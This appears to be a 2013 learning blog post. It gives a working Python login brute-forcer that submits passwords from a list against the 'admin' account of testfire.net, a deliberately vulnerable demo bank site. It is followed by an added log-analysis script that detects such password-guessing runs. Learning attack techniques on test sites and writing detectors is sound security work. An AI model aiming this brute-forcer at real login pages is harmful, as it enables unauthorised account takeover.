Tuesday, October 1, 2013

My lazy attempt towards python! #BeautifulSoup #Requests

Inspired by the amazing null humla session that I attended, I thought of writing my own simple login brute-forcer in Python using Requests. There are a lot of brute-forcing scripts in the market, but I thought of writing my own.
I love the Requests library for Python; as the author says, "It's HTTP for Humans", and it actually is. I really encourage using this library at least once if one wants to start learning Python web scraping.
I have also used the BeautifulSoup library to extract a few HTML tags. The website which I have used is http://www.testfire.net, which is a vulnerable bank application developed by IBM for web app testing.
The script is used to brute force all possible passwords against a single user name, "admin". I initially tried writing it with cookiejar, but somehow the code got a little lengthier, and then Requests came to my rescue.
The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin". With the Requests library it is possible to send the request through a proxy and inspect it before it reaches the server. Here I am running a proxy on port 8082 just to see the data that my script is sending. Feel free to use the script (for learning purpose only), here is the gist link.

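#Author: Prajal Kulkarni
import requests
import sys
from bs4 import BeautifulSoup as BS


# Send the traffic through the local intercepting proxy on port 8082
proxyDict = {"http": "http://127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url, m):
    # Submit the login form with the current user name / password pair
    t = requests.post(url, data=m, proxies=proxyDict)
    print(t.text)
    soup = BS(t.text, "html.parser")
    # Look up the account link and read its text
    a = soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    # The link may be missing from the response; treat that as a failed login
    x = str(a.string) if a is not None else ""
    print(x)
    if x == "MY ACCOUNT":
        print("The pass is" + " " + m['passw'])
        sys.exit()
    else:
        print("Password %s not working" % m['passw'])

def controller():
    m = {}
    # One candidate password per line
    with open('password.txt', 'r') as fh:
        f = fh.read().split('\n')
    for line in f:
        if not line:
            continue  # skip empty lines, e.g. the one after the final newline
        m["uid"] = "admin"
        m["passw"] = str(line)
        m["btnSubmit"] = "Login"
        print(m)
        connect(url, m)

controller()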
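
Seen from the server side, a run of this script is many failed logins for one user name from one client within a short time. The following is an added example, not part of the original post, that flags that pattern in login events and records whether a success followed; the log format, addresses, user names and thresholds are constructed assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events (not real logs): time, client IP, path, uid, outcome
SAMPLE_LOG = """\
2013-10-01T10:00:01 203.0.113.5 /bank/login.aspx admin FAIL
2013-10-01T10:00:02 203.0.113.5 /bank/login.aspx admin FAIL
2013-10-01T10:00:03 198.51.100.7 /bank/login.aspx alice FAIL
2013-10-01T10:00:04 203.0.113.5 /bank/login.aspx admin FAIL
2013-10-01T10:00:06 203.0.113.5 /bank/login.aspx admin FAIL
2013-10-01T10:00:08 198.51.100.7 /bank/login.aspx alice OK
2013-10-01T10:00:09 203.0.113.5 /bank/login.aspx admin FAIL
2013-10-01T10:00:11 203.0.113.5 /bank/login.aspx admin FAIL
2013-10-01T10:00:13 203.0.113.5 /bank/login.aspx admin OK
"""

def detect_guessing(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return one alert per (ip, uid) with >= threshold failures inside window."""
    recent = defaultdict(deque)  # (ip, uid) -> timestamps of recent failures
    alerts = {}                  # (ip, uid) -> alert record
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "/bank/login.aspx":
            continue  # not a login event in the assumed format
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
        key = (parts[1], parts[3])
        if parts[4] == "FAIL":
            q = recent[key]
            q.append(ts)
            # Drop failures that have aged out of the sliding window
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {"ip": key[0], "uid": key[1],
                               "first_seen": q[0], "compromised": False}
        elif parts[4] == "OK" and key in alerts:
            # A success after a guessing run means the password was found
            alerts[key]["compromised"] = True
    return list(alerts.values())

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print(alert)
```

A single mistyped password followed by a success, like the constructed "alice" events, stays below the threshold and raises no alert.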


